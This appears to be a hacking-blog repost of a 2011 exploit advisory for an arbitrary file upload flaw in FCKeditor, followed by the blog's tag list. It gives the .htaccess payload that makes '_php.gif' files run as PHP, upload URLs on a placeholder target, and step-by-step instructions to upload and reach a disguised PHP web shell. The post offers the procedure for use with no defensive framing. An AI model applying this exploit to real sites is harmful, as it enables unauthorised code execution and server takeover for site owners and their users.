In The Name Of GOD
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] script:http://sourceforge.net/projects/fckeditor/
[+] Author : pentesters.ir
[+] Website : WwW.PenTesters.IR
———————————————————
1.create a htaccess file:
code:
<FilesMatch “_php.gif”>
SetHandler application/x-httpd-php
</FilesMatch>
2.Now upload this htaccess with FCKeditor.
http://target.com/FCKeditor/editor/f...load/test.html
http://target.com/FCKeditor/editor/f...tors/test.html
———————————————————————————————-
3.Now upload shell.php.gif with FCKeditor.
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
5.http://target.com/anything/shell_php.gif
6.Now shell is available from server.
Subscribe to:
Post Comments (Atom)
Post Labels
- .htaccess
- 0-day
- Add-on
- AutoIT
- BackConnect
- BackDoor
- BackTrack
- Blogger
- Blogger Template
- Botnet
- Brute
- Bypass
- CEH
- CGI
- Checked
- Chrome
- Code
- Code RIP
- cPanel
- Crack
- CSRF
- CSS
- DDoS
- Decode
- DNS
- dork
- Drupal
- Ebook
- ebook hacking
- Encryption
- Exploit
- FireFox
- Flood
- Get Root
- GHDB
- Gmail
- Hacker
- hacker os
- Hacking and Security
- Hacking Tools
- HTML
- HTML5
- Infographic
- Internet Explorer
- IT News
- J2TeaM
- J2TeaM Tools
- Java
- JavaScript
- Javascript Injection
- Joomla
- keylog
- Lab Hack
- Linux
- Local Attack
- Local File Include
- Malware
- Metasploit
- Microsoft
- MyBB
- MySQL
- Network
- newbie
- newbie area vhb
- Oracle
- Password
- Path Disclosure
- Pen-Test
- Perl
- Phishing
- PHP
- Plugin
- Programming
- Python
- Remote Code Execution
- Remote Desktop
- Remote File Include
- Reverse
- Scanner
- Security
- SEO
- Shell
- Social Engineering
- Software
- SQL Injection
- Symlink
- Tản mạn
- thiet ke web
- Thủ Thuật
- Thủ thuật blog
- Tips
- Tools
- Tricks
- TUTORIALS
- Upload
- vBulletin
- vhb
- Vietnamese ebook
- Virus
- Vulnerability
- Web Developer
- WHMCS
- WiFi
- Windows
- WordPress
- Write-up
- XSS
- Yahoo
- Youtube
Post a Comment